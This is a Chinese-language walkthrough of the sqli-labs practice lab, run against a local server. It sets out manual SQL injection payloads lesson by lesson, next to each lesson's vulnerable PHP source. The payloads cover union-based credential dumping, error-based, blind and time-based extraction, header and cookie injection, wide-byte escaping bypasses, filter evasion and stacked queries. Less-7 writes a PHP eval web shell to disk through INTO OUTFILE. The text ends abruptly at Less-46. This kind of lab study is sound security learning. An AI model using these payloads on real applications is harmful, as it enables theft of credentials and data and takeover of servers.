sqli-labs 刷题记录

参考:

MYSQL注入天书

此文尽量使用手工注入以加深对原理的理解,竭力避免了使用sqlmap或者脚本自动化注入等方式。

Page-1 (Basic Challenges)

Less-1 GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入)

手动注入

进去之后发现让输入id,随便输一个数字id发现都可以正常回显,然后尝试注入

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1'

1_1.png

根据报错信息猜测原语句是用'$id'来处理的输入,故用'闭合即可。

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' or 1=1--+

1_2.png

正常回显,故用order by爆出列数,发现有3列(4时报错)

http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' order by 4--+

然后开始爆库名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

1_3.png

发现security数据库,开始爆表名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

1_4.png

users表里的列名

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

1_5.png

爆出表里的所有数据

http://127.0.0.1:8081/sqli-labs/Less-1/?id=-1'union select 1,2,group_concat(username,0x3a,password) from users--+

1_6.png

很好,我们终于达到了和不断直接输入?id=xxxxx相同的效果hhh😄

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

把传入的$id直接当作字符串拼接了进来,故只需要用'闭合掉前面的引号,然后用--+注释掉后面的语句即可完成注入

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

手动注入

输入?id=1'观察报错

2.png

根据报错猜测是未用''包裹$id,直接对输入进行拼接,故与less-1相比只需去掉数字后的'即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 or 1=1--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-2/?id=1 order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

可以看到直接把$id拼接了进来。

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

手动注入

输入?id=1'观察报错

3.png

根据报错猜测原语句是('$id'),故只需用')来闭合即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-3/?id=1')order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-3/?id=-1')union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

手动注入

还是输入?id=1',发现能正常显示,故使用?id=1"进行尝试

4.png

根据报错猜测原语句是("$id"),故只需用")来闭合即可。

#尝试
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")--+
#爆列数
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 1--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 2--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 3--+
http://127.0.0.1:8081/sqli-labs/Less-4/?id=1")order by 4--+
#爆库名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
#爆列名
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
http://127.0.0.1:8081/sqli-labs/Less-4/?id=-1")union select 1,2,group_concat(username,0x3a,password) from users--+

源码分析

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color="#FFFF00">';
print_r(mysqli_error($con1));
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

与less-1一样用''对输入进行处理来拼接,不同的是输入正确后不在显示数据库信息,而报错信息却能正确回显,此处将使用多种方式完成注入,以通过此关来学习各种注入方法及函数利用。

布尔盲注

利用left()和length()函数获取版本号及库名

逐位进行字符对比,如果正确则能看到You are in...........正确显示,否则不能。

#爆版本号,我的数据库版本是10.4.11-MariaDB
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),1)=1--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),2)=10--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(version(),15)='10.4.11-MariaDB'--+
#爆库长
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and length(database())=8--+
#爆库名,使用的数据库名称为security,先看第一位是不是大于a,然后逐位尝试
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),1)>'a'--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and left(database(),8)='security'--+
利用substr()和ascii()函数获取表名

逐位对比,如果正确则能看到You are in...........正确显示,否则不能。

#爆表名,这里第一个表是emails,使用的数据库是security
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+

#爆出第一个字符后挨个爆破剩余字符,最后获取第一个表名,如果想获取第二个,只需要修改limit后的内容即可
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+
利用regexp()函数获取列名字

正则匹配,如果正确则能看到You are in...........正确显示,否则不能。

#看users中是否有以us开头的列名
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
#看users中是否有以pass开头的列名
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass[a-z]' limit 0,1)--+
利用ord()和mid()函数获取users 表的内容
#第一个用户名为Dumb,此语句是看第一个用户名的第一个字符是否为D
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

报错注入

MySQL ERROR 1267 (HY000)错误解决办法

利用floor(rand(0)*2)进行报错注入
http://127.0.0.1:8081/sqli-labs/Less-5/?id=-1'union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns  group by a--+

5_1.png

利用 double 数值类型超出范围进行报错注入
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select (exp(~(select * FROM(SELECT USER())a))),2,3--+
利用 bigint 溢出进行报错注入
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+
利用xpath 函数报错注入
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+

5_2.png

http://127.0.0.1:8081/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+

5_3.png

利用数据的重复性
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x--+

5_4.png

延时注入
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as cur
rent) as tb1--+

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

手动注入

利用报错注入可以看到版本信息。

http://127.0.0.1:8081/sqli-labs/Less-6/?id=1"and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+--+

源码分析

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

""来处理$id,不回显正常输出的信息。

Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

源码分析

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

可以看出是使用了((''))来处理输入。

手动注入

#测试是否存在注入
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1')) or 1=1--+
#将user,2,3写入文件uuu.txt中
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT user(),2,3 into outfile "txt文件路径"--+
#将一句话木马写入进去
http://127.0.0.1:8081/sqli-labs/Less-7/?id=1'))UNION SELECT '<?php @eval($_POST["attack"])?>',2,3 into outfile "php文件路径"--+

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

手动注入

#测试注入点
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1'or 1=1--+
#布尔盲注
http://127.0.0.1:8081/sqli-labs/Less-8/?id=1' and left(version(),15)='10.4.11-MariaDB'--+

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysqli_error($con1));
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

这一关错误信息也不再回显,但可以通过是否出现You are in...........来实现布尔盲注。

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

手动注入

#时间盲注
#猜测数据库security
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1:8081/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysqli_error($con1));
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

输入被用""处理,其他与less-9相同。

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

手动注入

post接收参数

#万能,密码随意
admin'or 1=1#
#爆库名,密码随意
1admin'union select 1,database()#

源码分析

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

手动注入

#post传入
uname=1")or 1=1#&passwd=2

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

先用万能密码登录。

uname=1')or 1=1#&passwd=2

13.png

登录成功后便可以使用布尔盲注爆库等信息。

源码分析

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

#万能密码
admin"or 1=1#
#报错注入
uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit

14.png

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

手动注入

使用延时注入,正确直接登录成功,否则延时5s。

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

源码分析

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

手动注入

使用延时注入,正确直接登录成功,否则延时5s。

uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

源码分析

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

手动注入

#报错注入
uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit
#延时注入
uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit

源码分析

function check_input($con1, $value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysqli_real_escape_string($con1, $value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}

$uname=check_input($con1, $_POST['uname']);
$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

less-17check_input()中,对 username 进行各种转义的处理,所以此处不能使用username进行注入。

函数简介

addslashes() #函数返回在预定义字符之前添加反斜杠的字符串,如单引号('),双引号("),反斜杠(\),NULL。
stripslashes() #函数删除由 addslashes() 函数添加的反斜杠。
mysql_real_escape_string() #函数转义 SQL 语句中使用的字符串中的特殊字符,如\x00,\n,\r,\,',",\x1a。

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

手动注入

利用抓包工具修改user-agent即可

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

18_2.png

源码分析

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

对 uname 和 passwd 进行了 check_input()函数的处理,所以我们在输入uname 和passwd上进行注入是不行的,但可以利用insert。

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

手动注入

修改referer即可。

'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1

源码分析

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);

$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

手动注入

添加cookie即可

uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

20.png

源码分析

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

setcookie('uname', $cookee, time()+3600);

手动注入

Cookie进行base64编码即可

Cookie:
uname=YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

源码分析

function check_input($con1, $value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = '"' . mysqli_real_escape_string($con1, $value) . '"'; //添加了"
}
else
{
$value = intval($value);
}
return $value;
}

setcookie('uname', base64_encode($row1['username']), time()+3600);

手动注入

与less-21一样需要base64编码

源码分析

function check_input($con1, $value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysqli_real_escape_string($con1, $value) . "'";//添加了'
}
else
{
$value = intval($value);
}
return $value;
}

setcookie('uname', base64_encode($row1['username']), time()+3600);

Page-2 (Advanced Injections)

Less-23 GET - Error based - strip comments (基于错误的,过滤注释的GET型)

手动注入

#获取路径
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,@@basedir,'3
#获取数据库名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
#获取security中所有表名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
#获取users中所有列名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3
#获取users中username这一列内容
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3
#获取users中password这一列内容
http://127.0.0.1:8081/sqli-labs/Less-23/?id=-1'union select 1,(select group_concat(password) from security.users limit 0,1),'3

#报错注入获取数据库名
http://127.0.0.1:8081/sqli-labs/Less-23/?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

源码分析

$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

过滤了#--这两种注释符号。

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

手动注入

注册一个账号为admin'#的账户

24_1.png

注册成功后在后台可以看到信息

24_2.png

用刚注册的账号登录并修改密码即可更改admin的密码

24_3.png

源码分析

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

Less-25 Trick with OR & AND (过滤了or和and)

绕过or和and过滤

(1)大小写变形 Or,OR,oR

(2)编码,hex,urlencode

(3)添加注释/*or*/

(4)利用符号 and=&& or=||

手动注入

http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'||1=1--+ 
http://127.0.0.1:8081/sqli-labs/Less-25/?id=1'OOrr 1=1--+

源码分析

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)

return $id;
}

Less-25a Trick with OR & AND Blind (过滤了or和and的盲注)

手动注入

http://127.0.0.1:8081/sqli-labs/Less-25a/?id=-1 UNION select 1,@@basedir,3#

Less-26 Trick with comments and space (过滤了注释和空格的注入)

手动注入

我们可以用url编码进行绕过(这些编码在Windows下使用可能会出现问题)

%09 Tab键(水平)
%0a 新建一行
%0c 新的一页
%0d return 键
%0b Tab键(垂直)
%a0 空格

http://127.0.0.1:8081/sqli-labs/Less-26/?id=1'anandd(updatexml(1,concat(0x7e,(select @@version),0x7e),1));%00

源码分析

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}

less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(过滤了空格和注释的盲注)

手动注入

不能报错注入,直接盲注即可

源码分析

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}

less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)

手动注入

http://127.0.0.1:8081/sqli-labs/Less-27/?id=1'and(uPdatexml(1,conCat(0x7e,(selEct @@version),0x7e),1));%00

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}

less 27a GET - Blind Based- All your UNION & SELECT belong to us

手动注入

不能报错注入,直接盲注即可

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}

less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis (基于错误的,有括号的单引号字符型,过滤了union和select等的注入)

手动注入

双写绕过即可

源码分析

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}

less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的,有括号的单引号字符型,过滤了union和select等的注入

手动注入

双写绕过即可

源码分析

function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.
return $id;
}

Less-29 基于WAF的一个错误

手动注入

注意要配好tomcat的相关环境

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1'union select 1,database(),3--+

Less-30 Get-Blind Havaing with WAF

手动注入

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1"union select 1,database(),3--+

Less-31 Protection with WAF

手动注入

http://127.0.0.1:8081/sqli-labs/Less-29/index.jsp?id=1&id=-1")union select 1,database(),3--+

Less-32 Bypass addslashes()

宽字节注入

mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个 汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ (转换的函数或者思路会在每一关遇到的时候介绍)。 因此我们在此想办法将 ‘ 前面添加的 \ 除掉,一般有两种思路:

(1)%df 吃掉 \ 具体的原因是 urlencode(‘\) = %5c%27,我们在%5c%27 前面添加%df,形 成%df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此 事%df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。

(2)将 \’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的%5c 会被前面的%5c 给注释掉。这也是 bypass 的一种方法

手动注入

http://127.0.0.1:8081/sqli-labs/Less-32/?id=-1%df'union select 1,user(),3--+

源码分析

function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash


return $string;
}

Less-33 Bypass addslashes()

手动注入

http://127.0.0.1:8081/sqli-labs/Less-33/?id=-1%df'union select 1,user(),3--+

源码分析

function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}

Less-34 Bypass Add SLASHES

手动注入

34.png

Less-35 why care for addslashes()

手动注入

http://127.0.0.1:8081/sqli-labs/Less-35/?id=-1 union select 1,user(),3;--+

源码分析

function check_addslashes($string)
{
$string = addslashes($string);
return $string;
}

Less-36 Bypass MySQL Real Escape String

手动注入

http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%df'union select 1,database(),3--+
http://127.0.0.1:8081/sqli-labs/Less-36/?id=-1%EF%BF%BD'union select 1,user(),3--+

源码分析

function check_quotes($con1, $string)
{
$string=mysqli_real_escape_string($con1, $string);
return $string;
}

Less-37- MySQL_real_escape_string

手动注入

用burp即可

源码分析

$uname = mysqli_real_escape_string($con1, $uname1);
$passwd= mysqli_real_escape_string($con1, $passwd1);

mysqli_query($con1, "SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Page-3 (Stacked Injections)

Less-38 stacked Query

手动注入

加入一条数据

http://127.0.0.1:8081/sqli-labs/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

38.png

Less-39 stacked Query Intiger type

手动注入

http://127.0.0.1:8081/sqli-labs/Less-39/?id=1;insert into users(id,username,password) values ('39','less39','hello')--+

Less-40 stacked Query String type Blind

手动注入

http://127.0.0.1:8081/sqli-labs/Less-40/?id=1'); insert into users(id,username, password) values ('40','less40','hello')--+

Less-41 stacked Query Intiger type blind

手动注入

http://127.0.0.1:8081/sqli-labs/Less-41/?id=1;insert into users(id,username,password) values ('41','less41','hello')--+

源码分析

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less-42 - Stacked Query error based

手动注入

username:admin

Password:c’;create table less42 like users–+

42.png

less43 POST -Error based -String -Stacked with tiwst(POST型基于错误的堆叠变形字符型注入)

手动注入

username:admin

Password:c’);create table less43 like users–+

Less-44 - Stacked Query blind

手动注入

username:admin

Password:c’;create table less44 like users–+

less-45 基于报错的password处的’)闭合注入

手动注入

username:admin

Password:c’);create table less45 like users–+

less-46 ORDER BY-Error-Numeric

手动注入

#报错注入
